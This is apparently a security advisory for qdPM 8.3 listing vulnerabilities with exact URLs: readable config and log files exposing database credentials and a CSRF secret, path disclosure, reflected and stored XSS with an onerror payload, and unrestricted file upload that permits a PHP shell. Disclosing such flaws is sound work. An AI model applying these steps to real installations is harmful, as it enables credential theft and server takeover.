dqPM:				http://qdpm.net/
Version:			8.3
By Ross Marks:		http://www.rossmarks.co.uk
OSVDB Creditee:		http://osvdb.org/creditees/13991-ross-marks

1. Information Disclosure
	1.1 visit: http://website.com/qdPM/core/config/databases.yml
		by default this is readable containing configuration information such as database details (host, port, username & password)
	1.2 visit: http://website.com/qdPM/core/log/qdPM_prod.log	
		Publicly readable error logs
	1.3 visit: http://website.com/qdPM/core/apps/qdPM/config/settings.yml
		csrf_secret key disclosure along with other important information
	
2. Full Path Disclosure
	visit: http://website.com/qdPM/index.php/users/info/id/-999
		will return: 
		Fatal error: Call to a member function getName() on a non-object 
		in /path/to/qdPM/core/apps/qdPM/modules/users/templates/infoSuccess.php on line 1
		
3. Reflected XSS
	3.1 visit: http://website.com/qdPM/index.php/users
		POST: search[keywords]=<XSS>
		replace <XSS> with your payload (remember to escape javascript with ;</script> first)
	3.2 GET: /qdPM/index.php/skins?setSkin="><XSS>
		
4. Persistant XSS
	4.1 visit: http://website.com/qdPM/index.php/configuration?type=general
			"Name of application" is unfiltered (and viewed on every page) put payload here and save
	4.2 visit: http://website.com/qdPM/index.php/projects
			create a new project with the name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.3 visit: http://website.com/qdPM/index.php/tasks?projects_id=1 <-- any ID
			create a new task with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.4 visit: http://website.com/qdPM/index.php/tickets
			create a new ticket with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.5 visit: http://website.com/qdPM/index.php/discussions
			create a new discussion with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.6 visit: http://website.com/qdPM/index.php/projectReports
			create a new report with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.7	visit: http://website.com/qdPM/index.php/scheduler/personal
			create a new event with name: <img src="x" onerror="alert(1);" />
				(other variables are vulnerable)
	4.8 As a comment on 4.1 - 4.7 you can also inject javascript that will get rendered
	
				
5. Arbitrary File upload
	5.1	visit: http://website.com/qdPM/index.php/myAccount
		Browse to change avatar, upload any file you want (PHP shell for example)
		view page source to view location (rand number prepended) eg. http://website.com/qdPM/uploads/users/248743-shell.php
	5.2	ANY of the pages that accept attachments will allow any file to be uploaded
		(projects, tasks, tickets, discussions, reports, scheduler)
		uploaded file will have random number rand(111111,999999) prepended to file name
		and will be located in: http://website.com/qdPM/uploads/attachments/